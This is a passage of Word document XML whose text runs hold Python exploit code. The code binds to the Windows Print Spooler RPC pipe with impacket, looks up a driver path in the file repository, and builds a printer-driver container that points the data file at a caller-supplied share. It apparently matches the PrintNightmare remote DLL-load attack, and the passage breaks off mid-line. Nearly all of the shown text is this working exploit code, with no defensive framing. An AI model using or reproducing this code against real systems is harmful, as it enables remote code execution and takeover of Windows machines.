      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>class DRIVER_INFO_2_ARRAY(Structure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A186FA" w14:textId="48A5ACCB" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>def __</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">__(self, data = None, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pcReturned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C3FD9C" w14:textId="47555EDF" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>Structure.__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>__(self, data = data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E52CE0" w14:textId="33D8898A" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>self['drivers'] = list()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F77A19" w14:textId="4B7DBC1E" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>remaining = data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B13DA24" w14:textId="798E6080" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>if data is not None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A44E61" w14:textId="105CCEAC" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> in range(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pcReturned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F94AA" w14:textId="1197BA61" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:lastRenderedPageBreak/>
        <w:t>attr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = DRIVER_INFO_2_BLOB(remaining)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD704CA" w14:textId="0E6AE0AD" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>self['drivers'].append(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>attr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DF9AB7" w14:textId="600F475D" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>remaining = remaining[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>attr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>):]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F3685" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="5A1B7690" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">def connect(username, password, domain, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>lmhash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>nthash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>, address, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA06207" w14:textId="30DBFFD1" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">binding = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>r'ncacn_np</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>:{0}[\PIPE\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>spoolss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>]'.format(address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DDA014" w14:textId="028B47A7" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rpctransport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>transport.DCERPCTransportFactory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(binding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4252EA92" w14:textId="7DA41AA4" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="192"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FDAB93" w14:textId="1B9EF8D2" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rpctransport.set_dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BABD348" w14:textId="541DF4C1" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rpctransport.setRemoteHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D569CC" w14:textId="62984FCE" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="192"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B486C3B" w14:textId="083A8322" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>hasattr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rpctransport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>, '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>set_credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D0B53" w14:textId="33633EDF" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t># This method exists only for selected protocol sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6658143D" w14:textId="150138F0" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rpctransport.set_credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">(username, password, domain, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>lmhash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>nthash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D64FD" w14:textId="77242DB8" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="192"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E82F48" w14:textId="41FAD305" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>print("[*] Connecting to {0}".format(binding))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A89D0" w14:textId="5B3C038D" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6835D44A" w14:textId="71C6EEB3" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rpctransport.get_dce_rpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E1204" w14:textId="1DC50395" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A61C50" w14:textId="726F5061" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rprn.MSRPC_UUID_RPRN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F990274" w14:textId="7748126D" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFFEA5D" w14:textId="6D1F822B" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>print("[-] Connection Failed")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CEE3E6" w14:textId="45145450" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4309E0F8" w14:textId="371F7F52" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>print("[+] Bind OK")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0871F1" w14:textId="53FEAAD4" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7808214F" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="6AF2D027" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="00285D23" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>getDriver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>, handle=NULL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2789A9A9" w14:textId="5DB2E63D" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673E76BC" w14:textId="715B5813" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">resp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rprn.hRpcEnumPrinterDrivers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">=handle, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pEnvironment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>="Windows x64\x00", Level=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625DF751" w14:textId="3A5DEB25" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>blobs = DRIVER_INFO_2_ARRAY(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>b''.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(resp['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pDrivers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']), resp['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pcReturned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E5C347" w14:textId="7092739D" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> in blobs['drivers']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E81675E" w14:textId="3B65E34C" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>if "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>filerepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">" in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>DriverPathArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>'].lower():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15673C32" w14:textId="452559E5" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="347D02BC" w14:textId="404188C3" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="192"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADEC575" w14:textId="2D288073" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>print("[-] Failed to find driver")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F49E735" w14:textId="52728BAD" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21379D98" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="6DA592AD" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="03F8FB7A" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>def main(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>, share, handle=NULL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D417EB" w14:textId="01FBCC30" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>build</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> DRIVER_CONTAINER package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A6465F" w14:textId="2BF3192A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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rprn.DRIVER_CONTAINER</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E6869A" w14:textId="04E300F4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['Level'] = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6957E" w14:textId="7155A622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']['tag'] = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5861CA8E" w14:textId="6D283B52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cVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']     = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA483E0" w14:textId="2A876D84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pName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']        = "1234\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5463FD7E" w14:textId="58AA26B2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pEnvironment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>'] = "Windows x64\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B00B1CD" w14:textId="004333B9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pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">']  = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> + '\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B1D5F3" w14:textId="3CCB9869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pDataFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']    = "{0}\x00".format(share)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356981E7" w14:textId="6EB9A2AF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pConfigFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']  = "C:\\Windows\\System32\\winhttp.dll\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA93E5B" w14:textId="774FD6E4" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="192"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C9EED2" w14:textId="4CF3D686" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">flags = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
